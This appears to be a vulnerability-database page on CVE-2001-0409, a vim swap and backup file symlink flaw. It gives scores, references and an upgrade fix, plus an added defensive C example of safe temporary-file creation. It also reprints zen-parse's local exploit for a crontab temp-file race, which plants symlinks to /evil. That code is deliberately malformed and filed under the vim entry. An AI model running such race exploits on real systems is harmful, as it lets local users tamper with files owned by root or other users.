CVE-2001-0409
CVSS 2.1
Published: 2001-06-18 00:00:00
Revised: 2008-09-10 15:07:55

[Original] vim (aka gvim) allows local users to modify files being edited by other users via a symlink attack on the backup and swap files, when the victim is editing the file in a world writable directory.


[CNNVD] vim (aka gvim) vulnerability (CNNVD-200106-102)

        vim (aka gvim) has a vulnerability. When the victim is editing a file in a world-writable directory, a local user can modify the file being edited by means of symbolic links planted at the names of the backup and swap files.

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0409
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0409
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-102
(official data source) CNNVD

- Other links and resources

http://www.calderasystems.com/support/security/advisories/CSSA-2001-014.0.txt
(VENDOR_ADVISORY)  CALDERA  CSSA-2001-014.0
http://xforce.iss.net/static/6628.php
(UNKNOWN)  XF  vim-tmp-symlink(6628)
http://www.novell.com/linux/security/advisories/2001_012_vim.html
(UNKNOWN)  SUSE  SuSE-SA:2001:12

- Vulnerability information

vim (aka gvim) vulnerability
Low severity  Unknown
2001-06-18 00:00:00  2005-05-02 00:00:00
Local
        vim (aka gvim) has a vulnerability. When the victim is editing a file in a world-writable directory, a local user can modify the file being edited by means of symbolic links planted at the names of the backup and swap files.

- Advisories and patches


- Vulnerability information (20967)

Vim 5.x Swap File Race Condition Vulnerability (EDBID:20967)
linux local
2001-01-26 Verified
0 zen-parse
source: http://www.securityfocus.com/bid/2927/info

Vim is an enhanced version of the popular text editor vi.

A race condition vulnerability exists in the swap file mechanism used by the 'vim' program. The error occurs when the swap file name for a file being opened is already a symbolic link pointing to a non-existent file.

By guessing the name of a file that another user is about to edit, a local user may be able to create a malicious symbolic link from the predicted swap file name to a non-existent file. When vim follows that link while creating its swap file, the link's target is created with the permissions of the user running vim.
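The defensive pattern that closes this class of bug, as an added example that is not code from the original page or from the vim project: create the swap or backup file with O_CREAT|O_EXCL|O_NOFOLLOW, so that a pre-planted symlink at the expected name, even a dangling one, makes the open fail instead of creating the link's target with the editor's privileges. The swap file name, the target name and the use of /tmp below are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create `path` as a brand-new regular file, never following or reusing
 * whatever an attacker may have planted under that name. Returns an fd,
 * or -1 (errno EEXIST or ELOOP) if anything already exists there. */
int create_swap_safely(const char *path)
{
    /* O_EXCL makes open() fail if the name exists at all, and a symlink
     * (even a dangling one) counts as existing; O_NOFOLLOW also refuses
     * a link swapped in by a racing rename(). Mode 0600: owner only. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    struct stat st; /* paranoia: confirm we hold a plain, unshared file */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EEXIST;
        return -1;
    }
    return fd;
}

/* Demo (constructed names): plant a dangling symlink under the swap file
 * name, the precondition described above, then check that the hardened
 * open refuses it and the link target is never created.
 * Returns 1 if the defence held, 0 if not, -1 on setup failure. */
int demo_dangling_symlink_is_rejected(const char *dir)
{
    char swap[512], target[512];
    snprintf(swap, sizeof swap, "%s/.demo-file.swp", dir);
    snprintf(target, sizeof target, "%s/demo-must-not-exist", dir);
    unlink(swap); unlink(target);          /* clean slate for the demo */
    if (symlink(target, swap) != 0) return -1;
    int fd = create_swap_safely(swap);     /* must fail: name is taken */
    int rejected = (fd < 0);
    if (fd >= 0) close(fd);
    int target_created = (access(target, F_OK) == 0);
    unlink(swap); unlink(target);          /* tidy up */
    return (rejected && !target_created) ? 1 : 0;
}

int main(void)
{
    printf("defence held: %d\n", demo_dangling_symlink_is_rejected("/tmp"));
    return 0;
}
```

The same open flags protect any program that writes temporary files into a shared directory; the fstat check is belt and braces for the case where a rename() races the open.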

/*******************************************************************
             Crontab tmp file race condition

   http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771

   Apparently this is fixed. Wonder why it still works. 
      -- zen-parse

                     Local exploit

   Quick and dirty exploit for crontab insecure tmp files
   Redhat 7.0 - kept up2date with up2date
   Checked Tue Jun 26 00:15:32 NZST 2001
   -rw-------    1 root     root         4096 Jun 26 00:15 evil

   Requires root to execute crontab -e while the program is
   running.

   Not really likely to be too big of a problem, I hope.

   Could possibly be useful with the (still unpatched) 
   makewhatis.cron bug.

/*******************************************************************
 #define SAFER [1000]
/*******************************************************************/
int shake(int script kiddy)
{
 int f;
 char r SAFER;
 int w;

 f=fopen("/proc/loadavg","r"); 
 fscanf(f,"%*s %*s %*s %*s %s",r);
 fclose(f);
 w=atoi(r);
 return w;
}

main(int argc,char *argv[])
{
 int p;
 char v SAFER;
 sprintf(v,"/tmp/.crontab.%d.swp",shake());
 symlink("/evil",v);
 while(access("/evil",0))
 {
  for(p=-30;p<0;p++)
  {
   sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
   symlink("/evil",v);
  }
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
 for(p=-100;p<0;p++)
 {
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
}

 /*****************************************************************
 **   ***   *       **       *********      ***********************
 **    *    *   **   ******   *******   **   **********************
 **         *   **   **      ********   *******   ***      ********
 **   * *   *       *******   *******   ******  *  *  *  *  *******
 **   ***   *   ***********   **   **   **   *  *  *  *  *  *******
 **   ***   *   ******       ***   ***      ***   **  ****  *******
 *****************************************************************/
         //   
        //  xxxx   xxx    xxx   x   x
       //  xx     x   x  x      x   x
      //   xx     x   x   xxx   x   x
     //    xx     x   x      x   x x  
    //      xxxx   xxx    xxx     x


- Vulnerability information

5645
Vim Backup / Swap File Symlink Arbitrary File Modification
Local Access Required Race Condition
Loss of Integrity
Exploit Unknown

- Vulnerability description

vim contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when vim writes backup and temporary files to /tmp.

- Timeline

2001-01-26 Unknown
2001-01-26 Unknown

- Solution

Upgrade to version 5.7.71 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author


About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE, CWE and OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's related websites